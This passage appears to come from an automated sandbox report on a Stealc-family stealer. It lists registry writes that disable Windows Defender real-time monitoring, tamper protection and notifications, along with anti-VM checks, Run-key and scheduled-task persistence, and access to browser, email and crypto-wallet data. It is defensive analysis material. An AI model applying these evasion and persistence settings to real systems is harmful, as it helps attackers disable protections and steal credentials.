Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\10110580101\299f9f82e8.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Users\Admin\AppData\Local\Temp\10110580101\299f9f82e8.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Users\Admin\AppData\Local\Temp\10110580101\299f9f82e8.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\10110580101\299f9f82e8.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\Users\Admin\AppData\Local\Temp\10110580101\299f9f82e8.exe N/A

Modifies Windows Defender TamperProtection settings

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\Temp\10110580101\299f9f82e8.exe N/A

Modifies Windows Defender notification settings

defense_evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications C:\Users\Admin\AppData\Local\Temp\10110580101\299f9f82e8.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" C:\Users\Admin\AppData\Local\Temp\10110580101\299f9f82e8.exe N/A

Stealc

stealer stealc

Stealc family

stealc

Identifies VirtualBox via ACPI registry values (likely anti-VM)

defense_evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10110510101\d8c76c7b0b.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10110530101\3aae3cdde2.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10110540101\a84d3ad71d.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10110580101\299f9f82e8.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\TempGSNZAJHBXV0OYOZDWYCV7MAZRJJBODQS.EXE N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10110560101\563315ef27.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\TempGSNZAJHBXV0OYOZDWYCV7MAZRJJBODQS.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10110580101\299f9f82e8.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10110530101\3aae3cdde2.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10110540101\a84d3ad71d.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10110560101\563315ef27.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\TempGSNZAJHBXV0OYOZDWYCV7MAZRJJBODQS.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10110510101\d8c76c7b0b.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10110560101\563315ef27.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10110510101\d8c76c7b0b.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10110530101\3aae3cdde2.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10110540101\a84d3ad71d.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10110580101\299f9f82e8.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\TempGSNZAJHBXV0OYOZDWYCV7MAZRJJBODQS.EXE N/A

Identifies Wine through registry keys

defense_evasion
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10110560101\563315ef27.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10110530101\3aae3cdde2.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10110540101\a84d3ad71d.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10110580101\299f9f82e8.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Software\Wine C:\Users\Admin\AppData\Local\TempGSNZAJHBXV0OYOZDWYCV7MAZRJJBODQS.EXE N/A
Key opened \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10110510101\d8c76c7b0b.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A

Reads user/profile data of local email clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Windows security modification

defense_evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features C:\Users\Admin\AppData\Local\Temp\10110580101\299f9f82e8.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\Temp\10110580101\299f9f82e8.exe N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\563315ef27.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10110560101\\563315ef27.exe" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\cb0c0b51c3.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10110570101\\cb0c0b51c3.exe" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\299f9f82e8.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10110580101\\299f9f82e8.exe" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A

Checks installed software on the system

discovery

AutoIT Executable

Description Indicator Process Target
N/A N/A N/A N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\rapes.job C:\Users\Admin\AppData\Local\TempGSNZAJHBXV0OYOZDWYCV7MAZRJJBODQS.EXE N/A

Browser Information Discovery

discovery

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10110510101\d8c76c7b0b.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10110520101\78de00ab05.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10110530101\3aae3cdde2.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10110540101\a84d3ad71d.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10110570101\cb0c0b51c3.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\4a7dab448374270a90b2e15cd12df3f4c9120a4b2508204fa0499a21ea1cac4a.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10110560101\563315ef27.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language C:\Users\Admin\AppData\Local\Temp\10110570101\cb0c0b51c3.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10110520101\78de00ab05.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage C:\Users\Admin\AppData\Local\Temp\10110570101\cb0c0b51c3.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10110580101\299f9f82e8.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\TempGSNZAJHBXV0OYOZDWYCV7MAZRJJBODQS.EXE N/A

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files\Mozilla Firefox\firefox.exe N/A

Kills process with taskkill

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000_Classes\Local Settings C:\Program Files\Mozilla Firefox\firefox.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\TempGSNZAJHBXV0OYOZDWYCV7MAZRJJBODQS.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\TempGSNZAJHBXV0OYOZDWYCV7MAZRJJBODQS.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110510101\d8c76c7b0b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110510101\d8c76c7b0b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110520101\78de00ab05.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110520101\78de00ab05.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110520101\78de00ab05.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110520101\78de00ab05.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110530101\3aae3cdde2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110530101\3aae3cdde2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110540101\a84d3ad71d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110540101\a84d3ad71d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110540101\a84d3ad71d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110540101\a84d3ad71d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110540101\a84d3ad71d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110540101\a84d3ad71d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110560101\563315ef27.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110560101\563315ef27.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110570101\cb0c0b51c3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110570101\cb0c0b51c3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110580101\299f9f82e8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110580101\299f9f82e8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110570101\cb0c0b51c3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110570101\cb0c0b51c3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110580101\299f9f82e8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110580101\299f9f82e8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110580101\299f9f82e8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\10110520101\78de00ab05.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\10110580101\299f9f82e8.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\4a7dab448374270a90b2e15cd12df3f4c9120a4b2508204fa0499a21ea1cac4a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\4a7dab448374270a90b2e15cd12df3f4c9120a4b2508204fa0499a21ea1cac4a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\4a7dab448374270a90b2e15cd12df3f4c9120a4b2508204fa0499a21ea1cac4a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110570101\cb0c0b51c3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110570101\cb0c0b51c3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110570101\cb0c0b51c3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110570101\cb0c0b51c3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110570101\cb0c0b51c3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110570101\cb0c0b51c3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110570101\cb0c0b51c3.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110570101\cb0c0b51c3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110570101\cb0c0b51c3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110570101\cb0c0b51c3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110570101\cb0c0b51c3.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\4a7dab448374270a90b2e15cd12df3f4c9120a4b2508204fa0499a21ea1cac4a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\4a7dab448374270a90b2e15cd12df3f4c9120a4b2508204fa0499a21ea1cac4a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\4a7dab448374270a90b2e15cd12df3f4c9120a4b2508204fa0499a21ea1cac4a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110570101\cb0c0b51c3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110570101\cb0c0b51c3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110570101\cb0c0b51c3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110570101\cb0c0b51c3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110570101\cb0c0b51c3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110570101\cb0c0b51c3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110570101\cb0c0b51c3.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110570101\cb0c0b51c3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110570101\cb0c0b51c3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110570101\cb0c0b51c3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110570101\cb0c0b51c3.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4808 wrote to memory of 4900 N/A C:\Users\Admin\AppData\Local\Temp\4a7dab448374270a90b2e15cd12df3f4c9120a4b2508204fa0499a21ea1cac4a.exe C:\Windows\SysWOW64\cmd.exe
PID 4808 wrote to memory of 4900 N/A C:\Users\Admin\AppData\Local\Temp\4a7dab448374270a90b2e15cd12df3f4c9120a4b2508204fa0499a21ea1cac4a.exe C:\Windows\SysWOW64\cmd.exe
PID 4808 wrote to memory of 4900 N/A C:\Users\Admin\AppData\Local\Temp\4a7dab448374270a90b2e15cd12df3f4c9120a4b2508204fa0499a21ea1cac4a.exe C:\Windows\SysWOW64\cmd.exe
PID 4808 wrote to memory of 716 N/A C:\Users\Admin\AppData\Local\Temp\4a7dab448374270a90b2e15cd12df3f4c9120a4b2508204fa0499a21ea1cac4a.exe C:\Windows\SysWOW64\mshta.exe
PID 4808 wrote to memory of 716 N/A C:\Users\Admin\AppData\Local\Temp\4a7dab448374270a90b2e15cd12df3f4c9120a4b2508204fa0499a21ea1cac4a.exe C:\Windows\SysWOW64\mshta.exe
PID 4808 wrote to memory of 716 N/A C:\Users\Admin\AppData\Local\Temp\4a7dab448374270a90b2e15cd12df3f4c9120a4b2508204fa0499a21ea1cac4a.exe C:\Windows\SysWOW64\mshta.exe
PID 4900 wrote to memory of 1304 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 4900 wrote to memory of 1304 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
